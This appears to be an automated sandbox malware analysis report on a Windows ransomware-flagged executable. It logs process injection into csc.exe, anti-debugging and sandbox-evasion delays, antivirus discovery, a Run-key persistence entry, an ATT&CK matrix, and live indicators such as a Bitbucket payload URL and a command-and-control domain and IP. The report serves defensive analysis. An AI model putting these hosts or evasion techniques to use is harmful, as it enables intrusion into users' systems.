              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -55810s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -55702s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -55593s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6256Thread sleep time: -417000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59653s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59438s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59313s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59188s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59076s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58844s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58728s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6256Thread sleep time: -419000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59710s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59578s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59468s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59359s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59250s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59141s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58922s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58813s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58688s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58563s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58452s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58344s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0045E300 GetSystemTimeAsFileTime,GetModuleFileNameA,lstrcpyA,GetUserNameA,lstrcpyA,GetSystemInfo,GlobalMemoryStatus,0_2_0045E300
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59652Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59227Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58263Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57577Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57465Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57246Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57139Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56638Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56079Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55810Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55702Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 417000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59653Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59188Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59076Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58728Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 419000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59710Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59141Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58452Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58344Jump to behavior
              Source: csc.exe, 00000003.00000002.3519859215.0000000005147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluted
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA2B32 LdrInitializeThunk,3_2_09AA2B32
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0045ECD0 EnterCriticalSection,IsDebuggerPresent,DebugBreak,GetLocalTime,CreateFileA,LeaveCriticalSection,SetFilePointer,GetCurrentThreadId,GetCurrentThreadId,WriteFile,WriteFile,WriteFile,CloseHandle,LeaveCriticalSection,0_2_0045ECD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4B10000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0045ECD0 EnterCriticalSection,IsDebuggerPresent,DebugBreak,GetLocalTime,CreateFileA,LeaveCriticalSection,SetFilePointer,GetCurrentThreadId,GetCurrentThreadId,WriteFile,WriteFile,WriteFile,CloseHandle,LeaveCriticalSection,0_2_0045ECD0
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0045EED0 IsDebuggerPresent,DebugBreak,EnterCriticalSection,LeaveCriticalSection,0_2_0045EED0
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4B10000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4B10000Jump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4D8F008Jump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00412430
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: GetLocaleInfoA,0_2_00490D7C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0045F0B0 EnterCriticalSection,GetCurrentThread,SetThreadPriority,CreateFileA,LeaveCriticalSection,SetFilePointer,GetLocalTime,GetCurrentThreadId,GetCurrentThreadId,GetCurrentProcess,GetCurrentProcess,CloseHandle,LeaveCriticalSection,0_2_0045F0B0
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0045E300 GetSystemTimeAsFileTime,GetModuleFileNameA,lstrcpyA,GetUserNameA,lstrcpyA,GetSystemInfo,GlobalMemoryStatus,0_2_0045E300
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_004830CF EntryPoint,GetVersionExA,GetModuleHandleA,0_2_004830CF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: csc.exe, 00000003.00000002.3523255433.00000000098A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00462680 socket,WSAGetLastError,htonl,htons,bind,WSAGetLastError,inet_addr,GetLastError,listen,WSAGetLastError,WSACreateEvent,WSAEventSelect,0_2_00462680
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Disable or Modify Tools
              11
              Input Capture
              1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job
              12
              Windows Service
              12
              Windows Service
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol11
              Input Capture
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Service Execution
              1
              Scheduled Task/Job
              41
              Process Injection
              2
              Obfuscated Files or Information
              Security Account Manager136
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder
              1
              Scheduled Task/Job
              2
              Software Packing
              NTDS141
              Security Software Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              LSA Secrets141
              Virtualization/Sandbox Evasion
              SSHKeylogging3
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials11
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion
              DCSync1
              System Owner/User Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
              Process Injection
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              pPLwX9wSrD.exe39%ReversingLabsWin32.Ransomware.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.geomind.co.kr/0%Avira URL Cloudsafe
              http://www.geomind.co.kr/Online0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              bitbucket.org
              185.166.143.50
              truefalse
                high
                navegacionseguracol24vip.org
                181.131.217.244
                truefalse
                  unknown
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://bitbucket.org/facturacioncol/fact/downloads/null.exefalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.geomind.co.kr/OnlinepPLwX9wSrD.exe, OrionLegacyCLI.exe.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://github.com/mgravell/protobuf-netcsc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.geomind.co.kr/pPLwX9wSrD.exe, OrionLegacyCLI.exe.0.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/mgravell/protobuf-neticsc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/14436606/23354csc.exe, 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netJcsc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecsc.exe, 00000003.00000002.3521352384.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://bitbucket.orgcsc.exe, 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3521352384.0000000007387000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/11564914/23354;csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://stackoverflow.com/q/2152978/23354csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://bitbucket.orgcsc.exe, 00000003.00000002.3521352384.000000000739B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          181.131.217.244
                                          navegacionseguracol24vip.orgColombia
                                          13489EPMTelecomunicacionesSAESPCOfalse
                                          185.166.143.50
                                          bitbucket.orgGermany
                                          16509AMAZON-02USfalse
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1573894
                                          Start date and time:2024-12-12 17:28:31 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 40s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:5
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:pPLwX9wSrD.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:8ee7bb70506574eb0ba1bffc0bafd993c707d01e54385ca83fb3f731521a9298.exe
                                          Detection:MAL
                                          Classification:mal92.evad.winEXE@3/1@2/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 82%
                                          • Number of executed functions: 17
                                          • Number of non-executed functions: 334
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded IPs from analysis (whitelisted): 40.126.53.9, 40.126.53.7, 20.231.128.65, 20.190.181.4, 20.231.128.66, 40.126.53.12, 40.126.53.16, 40.126.53.8, 20.190.147.0, 13.107.246.63, 4.245.163.56
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, azureedge-t-prod.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: pPLwX9wSrD.exe
                                          TimeTypeDescription
                                          11:30:05API Interceptor709795x Sleep call for process: csc.exe modified
                                          17:30:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
                                          17:30:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          181.131.217.244s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                              SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                QU4rXM7CiL.exeGet hashmaliciousRemcosBrowse
                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                    nlfb.exeGet hashmaliciousUnknownBrowse
                                                      nlfb.exeGet hashmaliciousUnknownBrowse
                                                        qtIh.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                          KWAo.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                            build.exeGet hashmaliciousUnknownBrowse
                                                              185.166.143.50https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                  iVH355vnza.vbsGet hashmaliciousUnknownBrowse
                                                                    9QwZPBACyK.exeGet hashmaliciousUnknownBrowse
                                                                      PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                        jW3NEKvxH1.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                          yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                            yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                              lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                ft.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  navegacionseguracol24vip.orghCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                  • 181.131.217.244
                                                                                  s-part-0035.t-0009.t-msedge.nets0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                  • 13.107.246.63
                                                                                  GvVRQsUM7a.exeGet hashmaliciousDarkTortilla, RemcosBrowse
                                                                                  • 13.107.246.63
                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                  • 13.107.246.63
                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                  • 13.107.246.63
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.63
                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                  • 13.107.246.63
                                                                                  file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                  • 13.107.246.63
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 13.107.246.63
                                                                                  ICK6LzM018.exeGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.63
                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.63
                                                                                  fp2e7a.wpc.phicdn.net6C2Oryo96G.exeGet hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95
                                                                                  tntexpedio.exeGet hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95
                                                                                  MegAi Spoofer.lnk.b.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95
                                                                                  RQ--029.msiGet hashmaliciousAteraAgentBrowse
                                                                                  • 192.229.221.95
                                                                                  20515134161926018054.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                  • 192.229.221.95
                                                                                  MHDeXPq2uB.exeGet hashmaliciousRedLineBrowse
                                                                                  • 192.229.221.95
                                                                                  n70CrSGL8G.exeGet hashmaliciousRedLineBrowse
                                                                                  • 192.229.221.95
                                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 192.229.221.95
                                                                                  7fGdoA6Inq.exeGet hashmaliciousDCRatBrowse
                                                                                  • 192.229.221.95
                                                                                  SHIPPING_DOCUMENT.EXE.exeGet hashmaliciousUnknownBrowse
                                                                                  • 192.229.221.95
                                                                                  bitbucket.orghCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.49
                                                                                  https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  • 185.166.143.50
                                                                                  iVH355vnza.vbsGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  9QwZPBACyK.exeGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  • 185.166.143.50
                                                                                  YWFMFVCSun.batGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                  • 185.166.143.48
                                                                                  jW3NEKvxH1.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 185.166.143.50
                                                                                  yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                  • 185.166.143.50
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
